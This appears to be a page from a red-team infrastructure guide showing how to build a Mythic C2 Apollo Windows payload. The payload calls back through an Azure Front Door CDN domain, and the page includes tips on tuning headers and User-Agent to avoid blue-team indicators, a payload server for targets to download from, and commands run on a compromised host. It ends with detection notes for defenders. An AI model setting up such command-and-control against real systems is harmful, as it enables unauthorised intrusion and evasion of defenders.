AZURE FRONT DOOR IMPLEMENTATION

# 
root@oco:~$ BROWSER > MythicC2 > Navigation Pane > Create > Create Payload
 Target OS: Windows
 Payload Type: Apollo
 Build Parameters: WinExe
 Build Cmds into Agent: include all
 C2 Profiles:
  Method: http
  Callback Host: {this is the CDN distribution domain name which is the exposed endpoint}
   - {https://{cdnService}.azurefd.net}
  Callback Interval in seconds: 10
  Callback Jitter in percent: 23
  Callback Port: 443
   - everything else is default!
  HTTP Headers
   - use cases: {can be modified to accept only a specific HTTP Headers like cookies from a target}
   User-Agent: 
    - use cases: {can be modified in case the attacker specified user-agent is now a known IOC for the blue team}
 Payload Review: 
  Payload Name: {arbitraryName}.exe
  Description: N/A
  Create Payload!
  
 * this payload can be downloaded from the payload section via the download URL
    - once downloaded by the red team operator, it MUST be transferred to the Payload/Malware Server
       - the target(s) downloads these payloads from the payload server

#example trigger
PS C:\target> {payload}.exe

MythicC2 > Active Callbacks
 Interaction: whoami
 Interaction: ps
 
 * since everything is happening via TLS/SSL connection, the blue team won't be able
   to see/decrypt the cmds that were executed
    - blue teams should be able to see an outbound ssl/tls connection to the IP of the
      exposed redirector (aws cloudfront)see 
    - blue teams should also be able to see running processes w/ pids
    - some indicators should also be visible via Windows Event Logs
       - for thorough analysis, implement sysmon on the hosts and send the
         logs to SIEM

PreviousAWS CLOUDFRONT IMPLEMENTATION NextNGINX CONDITIONAL REDIRECTION IMPLEMENTATION

Last updated 11 months ago